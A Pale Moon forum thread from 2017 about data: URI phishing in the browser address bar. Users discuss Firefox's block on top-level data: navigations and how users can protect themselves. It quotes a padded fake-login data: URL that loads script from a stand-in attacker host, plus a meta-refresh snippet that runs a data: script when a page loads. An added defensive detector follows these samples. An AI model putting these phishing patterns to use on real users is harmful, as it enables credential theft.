Javascript execution exploit even with everything blocked


dark_moon
Knows the dark side
Posts: 3704
Joined: Mon Jan 09, 2012 5:34 pm
Location: Germany

Javascript execution exploit even with everything blocked

Postby dark_moon » Sat Dec 02, 2017 9:10 pm

(Everything blocked in uMatrix)

With this fixed bug: bug #1331351 (Consider blocking top level window data: URIs) from Firefox 56, this can be solved with the new about:config setting "security.data_uri.block_toplevel_data_uri_navigations" set to "true".
Has Pale Moon included that fix, or will it?

It's not a uMatrix-related bug.
Happy Pale Moon x64 under Win7 x64 User
German translator for Pale Moon 15+ and Pale Moon Commander addon

HowTo create a new Pale Moon Profile & use the Safe Mode
My GPG Key: 0x01EAFE95

joe04
Fanatic
Posts: 220
Joined: Mon Sep 28, 2015 4:38 pm
Location: US

Re: Javascript execution exploit even with everything blocked

Postby joe04 » Sun Dec 03, 2017 12:15 am

This is an address bar fix to help prevent Gmail phishing schemes. (Read the link in the first bug post.)

How did you conclude this is a JS exploit?


Re: Javascript execution exploit even with everything blocked

Postby dark_moon » Sun Dec 03, 2017 9:39 am



Re: Javascript execution exploit even with everything blocked

Postby joe04 » Sun Dec 03, 2017 6:47 pm

Right, it's malicious JS bundled in a data: blob. I don't consider that a true JS exploit, per se. It's a case of circumventing the normal JS sandboxing via the data: URI scheme, which is what this phishing attack does.

I would agree that if the Mozilla patch could be ported to PM/UXP then that would be a good thing assuming no adverse side effects.

But, overall, not a problem that should cause anyone to lose a wink of sleep. The #1 thing is pay attention to what links you click! That's always the best defense against phishing.


Re: Javascript execution exploit even with everything blocked

Postby dark_moon » Sun Dec 03, 2017 7:05 pm

joe04 wrote:The #1 thing is pay attention to what links you click! That's always the best defense against phishing.

That's security by obscurity.
How do you know the link is secure? How do you know the link doesn't use an exploit?
Sure, you can pay attention, but that doesn't help if the browser doesn't protect you against that.

Also, the data: blob even loads if you don't allow JavaScript for the test site.
Now what?


Re: Javascript execution exploit even with everything blocked

Postby joe04 » Sun Dec 03, 2017 7:14 pm

Let's be clear on how these data: URI phishing attacks actually work. From the link:

The way the attack works is that an attacker will send an email to your Gmail account. That email may come from someone you know who has had their account hacked using this technique. It may also include something that looks like an image of an attachment you recognize from the sender.

You click on the image, expecting Gmail to give you a preview of the attachment. Instead, a new tab opens up and you are prompted by Gmail to sign in again. You glance at the location bar and you see accounts.google.com in there. It looks like this….

[image: screenshot of the address bar]

So what I said before is still true: for phishing, you must pay attention. ANY URL THAT BEGINS WITH data: IS NOT TO BE TRUSTED


Re: Javascript execution exploit even with everything blocked

Postby joe04 » Sun Dec 03, 2017 7:17 pm

dark_moon wrote:Sure, you can pay attention, but that doesn't help if the browser doesn't protect you against that.

Also, the data: blob even loads if you don't allow JavaScript for the test site.
Now what?

Good point, and like I said it would be best to patch PM/UXP for this.

Moonchild
Pale Moon guru
Posts: 20065
Joined: Sun Aug 28, 2011 5:27 pm
Location: 58.5°N 15.5°E

Re: Javascript execution exploit even with everything blocked

Postby Moonchild » Sun Dec 03, 2017 8:00 pm

The patch isn't a fix, because there is nothing to fix XD. (There is no fix for PEBCAK)
All it does is prevent data: URIs from being used in the address bar; it's an OK enhancement if you don't trust your own prowess on the web, and it does reduce potential phishing scenarios (especially because of principal inheritance keeping the state of the opener).
Help with this is welcome -- do note 2 follow-up bugs to the bz bug mentioned: bug #1395948 and bug #1394554
I've opened Issue #1528 to track and solve this enhancement implementation.
Improving Mozilla code: You know you're on the right track with code changes when you spend the majority of your time deleting code.

c7rax
Moongazer
Posts: 9
Joined: Sun Nov 12, 2017 1:06 pm

Re: Javascript execution exploit even with everything blocked

Postby c7rax » Tue Dec 05, 2017 3:28 pm

joe04 wrote:[image]

What does this "data:" protocol do, and how unsafe is it?

gracious1
Astronaut
Posts: 647
Joined: Sun May 15, 2016 5:00 am
Location: snowy upstate NY

Re: Javascript execution exploit even with everything blocked

Postby gracious1 » Wed Dec 06, 2017 4:46 am

c7rax wrote:
joe04 wrote:[image]

What does this "data:" protocol do, and how unsafe is it?

Perhaps this article will help:
Data URI Scheme
It's a way to reduce the number of HTTP requests, e.g. by fetching the style sheet inline, but it can be exploited easily by wrongdoers.
Be not the first by whom the new are tried, nor yet the last to lay the old aside.


Re: Javascript execution exploit even with everything blocked

Postby c7rax » Wed Dec 06, 2017 8:04 pm

Oh well, and this example was enough for me:
d@ta:text/html,https://login.yahoo.com/[ LARGE AMOUNT OF SPACES ]<skrypt src="//attacker.hack/opener/mask.skrypt"></skrypt>
to see how unsafe it can be; especially the "large amount of spaces" gives away the true intention of such a website.


Re: Javascript execution exploit even with everything blocked

Postby joe04 » Thu Dec 07, 2017 5:08 pm

c7rax wrote:Oh well, and this example was enough for me:
d@ta:text/html,https://login.yahoo.com/[ LARGE AMOUNT OF SPACES ]<skrypt src="//attacker.hack/opener/mask.skrypt"></skrypt>
to see how unsafe it can be; especially the "large amount of spaces" gives away the true intention of such a website.

Another good example of a phishing attack using this data: URI.

So if you see anything that starts with data:text/html in your address bar it's a RED FLAG and time to close that tab.

GrayFace
New to the forum
Posts: 2
Joined: Fri Dec 08, 2017 12:25 am

Re: Javascript execution exploit even with everything blocked

Postby GrayFace » Fri Dec 08, 2017 2:14 am

Clicking? Red flags? You wish!

Code:

<meta http-equiv="refresh" content="0;URL=data:text/html,<script>alert('Oops!')</script>" />

Would execute the script when an infected page loads.
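
The two patterns shown in this thread (c7rax's padded data:text/html URL and GrayFace's meta refresh) fed through an added defender-side check; this is example code, not from the thread, Pale Moon or Firefox, and its document-type list and the 20-space padding threshold are assumptions (it runs under Node, using Buffer for base64).

```javascript
// Added example (not code from the thread or from Pale Moon): a defender-side check
// modelling what security.data_uri.block_toplevel_data_uri_navigations guards against:
// it parses a data: URI, decodes the payload and lists why a top-level navigation
// to it should be refused or flagged.
// Split "data:[<mediatype>][;base64],<payload>" into its parts and decode the payload.
function parseDataUri(uri) {
  const m = /^data:([^,]*),([\s\S]*)$/i.exec(uri.trim());
  if (!m) return null;
  const params = m[1].split(";").map(s => s.trim()).filter(Boolean);
  const mediaType = (params.shift() || "text/plain").toLowerCase();
  const base64 = params.some(p => p.toLowerCase() === "base64");
  let body;
  try {
    body = base64 ? Buffer.from(m[2], "base64").toString("utf8") : decodeURIComponent(m[2]);
  } catch (e) {
    body = m[2]; // malformed encoding: inspect the raw payload instead
  }
  return { mediaType, base64, body };
}

// Which types count as script-capable documents is an assumption for this
// example, not the browser's real allow-list.
const DOCUMENT_TYPES = ["text/html", "application/xhtml+xml", "image/svg+xml"];

function assessTopLevelNavigation(uri) {
  const parsed = parseDataUri(uri);
  const reasons = [];
  if (!parsed) return { block: false, reasons }; // not a data: URI, out of scope here
  const { mediaType, body } = parsed;
  if (DOCUMENT_TYPES.includes(mediaType)) {
    reasons.push("top-level navigation to a data:" + mediaType + " document");
  }
  if (/<script[\s>]/i.test(body)) reasons.push("payload contains a <script> element");
  // c7rax's pattern: a trusted-looking URL followed by enough whitespace to push
  // the real content out of the visible address bar.
  if (/^\s*https?:\/\/\S+\s{20,}/i.test(body)) {
    reasons.push("address-bar padding after a trusted-looking URL");
  }
  return { block: reasons.length > 0, reasons };
}

// GrayFace's point: no click is needed if an infected page carries a
// <meta http-equiv="refresh">; extract the target so it gets the same check.
function metaRefreshTarget(html) {
  const tag = /<meta\s[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*?content\s*=\s*(["'])([\s\S]*?)\1/i.exec(html);
  if (!tag) return null;
  const url = /^\s*\d+\s*;\s*url\s*=\s*([\s\S]*)$/i.exec(tag[2]);
  return url ? url[1].trim() : null;
}
```

A real navigation guard would run at the point where the browser resolves a top-level load, before any document is created; the check above only classifies the target string.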


Re: Javascript execution exploit even with everything blocked

Postby joe04 » Fri Dec 08, 2017 5:49 pm

True, the data:URI webpage JS could be anything (including your example snippet), and thus it would be good to patch this little hole in the browser. That's already been discussed in this thread and a Github issue filed.

I should add to my prior post that in the case of phishing emails, also report it to Google, Yahoo, or whoever your email provider is. (Over the years I've seen plenty of botnet spam/phishing emails in my webmail Spam folder, and have flagged the rare few that made it to my Inbox.)
